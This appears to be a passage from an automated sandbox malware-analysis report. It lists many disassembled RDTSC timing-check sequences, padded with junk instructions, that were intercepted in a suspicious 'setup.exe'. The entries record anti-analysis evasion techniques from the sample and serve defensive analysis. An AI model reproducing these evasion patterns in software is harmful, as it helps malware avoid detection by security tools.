Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E3161 second address: 4E3191 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD346616h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F47CD34661Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47CD346616h 0x0000001f jmp 00007F47CD34661Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E3191 second address: 4E319B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2332 second address: 4E2336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E2336 second address: 4E233A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E9B55 second address: 4E9B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E980F second address: 4E9839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007F47CD36120Eh 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F47CD36120Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EC79B second address: 4EC7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F25F4 second address: 4F2608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F47CD361212h 0x0000000c je 00007F47CD361206h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F2608 second address: 4F260C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F19E5 second address: 4F1A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47CD361206h 0x0000000a jmp 00007F47CD361212h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F47CD361206h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F1A0C second address: 4F1A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F1E54 second address: 4F1E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F47CD361220h 0x0000000f jno 00007F47CD361206h 0x00000015 jmp 00007F47CD361214h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F1E7D second address: 4F1E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 455C07 second address: 455C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4C8B second address: 4F4CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346626h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CAB second address: 4F4CB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CB7 second address: 4F4CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD346627h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CD3 second address: 4F4CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4CDE second address: 4F4CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F4E3F second address: 4F4E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F9FF1 second address: 4F9FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4F9FFA second address: 4FA000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FF3C second address: 49FFCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47CD34661Bh 0x0000000e popad 0x0000000f push eax 0x00000010 jne 00007F47CD34662Bh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F47CD346618h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F47CD346618h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dx, cx 0x00000050 mov cx, di 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FFCA second address: 49FFD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500629 second address: 50062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50062D second address: 500631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500631 second address: 500637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007DF second address: 5007EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007EC second address: 5007F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007F2 second address: 5007F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007F6 second address: 5007FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5007FA second address: 500806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500AB0 second address: 500AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500AB4 second address: 500AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 500D4A second address: 500D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010A2 second address: 5010AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010AA second address: 5010CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F47CD346616h 0x0000000c jmp 00007F47CD34661Fh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5010CC second address: 5010DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F47CD36120Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50191A second address: 501924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501924 second address: 50192A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50192A second address: 50193A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Bh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501EE4 second address: 501EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501EF3 second address: 501F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346623h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 501F0E second address: 501F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505F8D second address: 505F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505F91 second address: 505F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50613D second address: 506143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 506143 second address: 50614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 468147 second address: 46818C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jo 00007F47CD346616h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F47CD34661Ch 0x00000013 jl 00007F47CD346616h 0x00000019 popad 0x0000001a ja 00007F47CD346618h 0x00000020 popad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F47CD346626h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46818C second address: 468192 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 468192 second address: 46819D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46819D second address: 4681A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB3E second address: 50EB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F47CD346624h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB60 second address: 50EB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361219h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50EB80 second address: 50EB85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DCC1 second address: 50DCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F47CD36120Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F47CD36120Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE62 second address: 50DE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F47CD34661Ch 0x0000000e jc 00007F47CD346616h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE79 second address: 50DE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50DE7F second address: 50DE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47CD346620h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E166 second address: 50E16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E4C7 second address: 50E4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E4CB second address: 50E4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5173C7 second address: 5173D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5155E6 second address: 515606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515606 second address: 51560C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51560C second address: 515612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515612 second address: 51561E instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD34661Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51561E second address: 51564B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361215h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F47CD36120Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E46 second address: 515E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E60 second address: 515E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47CD361218h 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E97 second address: 515EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F47CD34661Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F47CD346620h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51635A second address: 516365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47CD361206h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516365 second address: 516381 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F47CD34661Eh 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B40 second address: 516B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B5F second address: 516B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B63 second address: 516B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5151D2 second address: 5151E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47CD346620h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5151E8 second address: 5151EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51D830 second address: 51D834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DB98 second address: 51DBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBA1 second address: 51DBA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBA5 second address: 51DBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBAB second address: 51DBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBB1 second address: 51DBCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47CD36120Dh 0x00000008 jns 00007F47CD361206h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52107F second address: 521085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52A037 second address: 52A047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F47CD361206h 0x0000000a jng 00007F47CD361206h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 529E85 second address: 529E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F47CD346616h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 529E95 second address: 529EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F47CD36120Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D8EC second address: 52D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D453 second address: 52D457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D457 second address: 52D466 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D466 second address: 52D48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361218h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F47CD361206h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D48F second address: 52D495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D495 second address: 52D4B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361218h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5301A7 second address: 5301AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 530302 second address: 53030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F47CD361206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53030E second address: 530312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53744C second address: 537450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 537450 second address: 53745A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
